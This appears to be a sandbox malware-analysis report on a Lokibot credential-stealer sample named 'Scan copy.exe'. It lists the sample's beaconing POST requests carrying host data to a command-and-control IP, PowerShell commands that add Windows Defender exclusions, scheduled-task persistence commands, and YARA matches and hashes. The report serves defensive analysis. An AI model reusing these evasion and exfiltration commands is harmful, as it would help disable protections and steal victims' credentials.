Nov 28, 2024 09:16:01.069273949 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:01.189356089 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:02.507936954 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49982	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:02.769401073 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:02.889650106 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:04.174340963 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49987	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:04.467031956 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:04.587141991 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:06.009777069 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49990	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:06.268991947 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:06.389002085 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:07.709157944 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	49995	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:07.975691080 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:08.095796108 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:09.414546013 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	50000	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:09.677831888 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:09.797792912 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:11.218923092 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	50004	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:11.494457006 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:11.614597082 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:13.036164045 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	50009	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:13.324951887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:13.446835995 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:14.719775915 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	50012	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:16:14.991100073 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:16:15.111181974 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:16.432226896 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	03:14:09
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\Scan copy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Scan copy.exe"
Imagebase:	0x350000
File size:	721'408 bytes
MD5 hash:	8C4DA707092623F03586E61F56755840
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1295403096.00000000051B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1291320333.000000000277C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1291953890.00000000038EA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1291953890.0000000003722000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:14:10
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"
Imagebase:	0xf10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:14:11
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:14:11
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
Imagebase:	0xf10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:14:11
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:14:11
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"
Imagebase:	0xb70000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:14:11
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:14:11
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\Scan copy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Scan copy.exe"
Imagebase:	0x6d0000
File size:	721'408 bytes
MD5 hash:	8C4DA707092623F03586E61F56755840
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000A.00000002.2502216653.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	03:14:13
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
Imagebase:	0xbf0000
File size:	721'408 bytes
MD5 hash:	8C4DA707092623F03586E61F56755840
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.1347693310.0000000003024000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:14:14
Start date:	28/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:14:16
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"
Imagebase:	0xb70000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:14:16
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:14:17
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
Imagebase:	0xca0000
File size:	721'408 bytes
MD5 hash:	8C4DA707092623F03586E61F56755840
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000014.00000002.1320268746.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.6%
Total number of Nodes:	188
Total number of Limit Nodes:	15

Executed Functions

Function 059541C4 Relevance: 6.9, Strings: 5, Instructions: 622
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 05957301
Hq, xrefs: 0595741B
Hq, xrefs: 05957394
Hq, xrefs: 05957563
Hq, xrefs: 059574A5

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq$Hq$Hq
API String ID: 0-3799487529
Opcode ID: 322cfc221d787920958d1ceb010725a7291c0acd9d8ea3b389ec31e8b83570a9
Instruction ID: 3a1066df23c695e4809dbdce1e8454fcae612fc963d6ed557dca99f0e2e96fdb
Opcode Fuzzy Hash: 322cfc221d787920958d1ceb010725a7291c0acd9d8ea3b389ec31e8b83570a9
Instruction Fuzzy Hash: 2F327D30E002188FDB59DFA9C8547AEBBF2FFC8310F148469D80AAB295DB349D55CB95

Function 05956D31 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9271f8332ee4708e2fb1d1ace8499ea9f2c6ef0ff729369a60b833fc9aa19e22
Instruction ID: cbfc3fdc76a5d0b96df818dc985ec614c921ac56cd9a694e78e018709902532f
Opcode Fuzzy Hash: 9271f8332ee4708e2fb1d1ace8499ea9f2c6ef0ff729369a60b833fc9aa19e22
Instruction Fuzzy Hash: 2AC13931A002149FCF55CFA5C984B9DBBB2FF85320F1485A9D849AB255EB30AAA5CB50

Function 0595F788 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdfadaf52a8474c354d92312ff0eab2e58e8c7478ba1abd5c7428fe178e3e132
Instruction ID: c5a0c402373de63344c703b4deaeeffb23b16f0dd95be1d893197db2137e7714
Opcode Fuzzy Hash: bdfadaf52a8474c354d92312ff0eab2e58e8c7478ba1abd5c7428fe178e3e132
Instruction Fuzzy Hash: 09A104B0D05228CFDB14CFA6D844BEEBBB6FF89320F009569D90AA7245DB381995CF40

Function 0595F778 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d1eace9878a202510baf37253b8fb6d952ebe7595bc91a8d20146dd705f699
Instruction ID: f1053a0f3e0be6d49a7bcab1dece9c053d71590e2e6bab7ebac50d5d51425d9b
Opcode Fuzzy Hash: 99d1eace9878a202510baf37253b8fb6d952ebe7595bc91a8d20146dd705f699
Instruction Fuzzy Hash: D4A105B0D05228CFDB14CFA5D844BEEBBB6FF89320F1095A9D90AA7245DB345A95CF40

Function 00B443E8 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58b53b7c0abd3b92e734f3a35b9ed7b4569f011dce57f4e5697dbf4320ab0d49
Instruction ID: e70cbd0be1e16d0b4fe3541806018c5ef451aa7f2354e42c2464104128379436
